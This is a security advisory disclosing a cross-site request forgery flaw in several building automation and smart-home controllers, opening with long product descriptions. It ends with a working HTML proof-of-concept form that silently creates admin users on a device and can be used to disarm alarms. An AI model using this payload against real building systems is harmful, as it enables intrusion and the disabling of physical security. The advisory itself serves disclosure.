#1 The Risk-Terminator Web Graphic control BEMS (Building Energy Management System) are designed to provide you with the latest in the Human Machine Interface (HMI) technology, for completely monitoring and controlling management. It may be used singly for small and medium sized facilities, could be linked together via the high-speed Ethernet to other servers that suit to World Wide Web (WWW) or Local Area Network (LAN) for large and more sophisticated applications. The Risk-Terminator practice Web basic conception that with operation simply and conveniently, totally share risk and make sure of security. Even remote sites may be controlled and monitored through Ethernet port, which base on standard transferring protocol like XML, Modbus TCP/IP or BACnet or URL.

#2 The RiskBuster is a Web enabled network Router Server that uses Ethernet and TCP/IP networking technologies. It incorporates an embedded web server that can deliver user-specific web pages to any PC or mobile terminal running internet browser software. A user with appropriate security codes can make adjustments or monitor the network control unit from any internet access point in the world. It also provides network management, integration and process control functions for any existing or new building controllers and microprocessor based equipments or system in buildings. The management function provided by the RiskBuster such as trend log and alarm generation improves building controllers and microprocessor based equipments or system management and audit trail capabilities. The integration function provided by the RiskBuster allows seamless integration such as information sharing (read/write) between building controllers and microprocessor based equipments or system without any need of major upgrade or equipments replacement and allow cost saving. The process control functions provided by the RiskBuster allow global control action to be implemented across any building controllers and microprocessor based equipments or system to allow full building control. The RiskBuster provide a truly cost effective solution for any building automation or high level integration application. A truly Ethernet network compliant feature allows the RiskBuster to be install anywhere in the building.

#3 ECM0000160 Digital Logic Controller (DLC) are Pre-programmed controller it intended for Building Automate System; Environment control system; HVAC control system and other types of equipment. Being fully programmable it ensures complete application versatility, allowing specific products to be created according to customer requests. This controller is a configurable unitary controller based on the 32bit series microcomputer, with an on-board clock, have two RS-485 local bus.

#4 The ECS0000160 is a Router Controller for building and industry products based on various microprocessors. It not only accessing information but also monitoring and controlling across Internet directly. The ECS0000160 can totally replace and improve a typical system that always has tedious panel and complex working process. An obvious benefit to our customers is that ECS0000160 enabling them to interact with their systems anytime, anywhere, not only just allowed to connect with singular specific operating system. It's like a whole package, which provides browsers an easy platform to monitor and control the doors, alarms, devices, etc. that all through web-pages operating, which works base on standard transmission Internet protocol. The ECS0000160 provides a low industry cost. A truly friendly network interface which is simple and easy to apply on factory floors. It supports from serial ports with options of RS485.

#5 HOME SERVER-EHC9246150 - This web basic home-server is with the specifications of hidden installation, 32bits microcomputer and I/O Peripheral expansion circuit, which include: D/A conversion circuit, A/D conversion circuit and optical isolation circuit, using default proportional, integral and differential (P+I+D) and dead-zone control to control accurately. The controller features contains the sensing system, proportional control systems, computing modules, control modules, alarm detection system, and so on. It mainly used in building control, plant monitoring, air monitoring, lighting and power control, the use of premises for buildings, factories, offices, conference rooms, restaurants, hotels, etc.

Desc: The Building Automation System / SmartHome allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. These actions can be exploited to perform any CRUD operation like user creation, alarm shutdown and account password change with administrative privileges if a logged-in user visits a malicious web site.

Tested on: EMBED/1.0
           Apache Tomcat/6.0.44
           Apache Tomcat/6.0.18
           Windows Server
           MySQL Version 5.1.60
           MySQL Version 4.0.16
           Version 2.0.1.28 20180628

Vulnerability discovered by Neurogenesia
                            @zeroscience

Advisory ID: ZSL-2021-5671
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5671.php

25.06.2021

--

Cross-Site Request Forgery (CSRF) - Add / Modify Users or Disarm Alarm
----------------------------------------------------------------------

- CSRF exists in the entire solution for any CRUD operation.

PoC:

<html>
  <body>
    <form action="http://192.168.1.3:8080/usersave" method="POST">
      <input type="hidden" name="bk" value="-1" />
      <input type="hidden" name="edtText" value="" />
      <input type="hidden" name="comText" value="19" />
      <input type="hidden" name="delrow" value="" />
      <input type="hidden" name="hiddenText" value="useruser19guestguest10rootembed19adminadmin19" />
      <input type="submit" value="Submit" />
    </form>
  </body>
</html>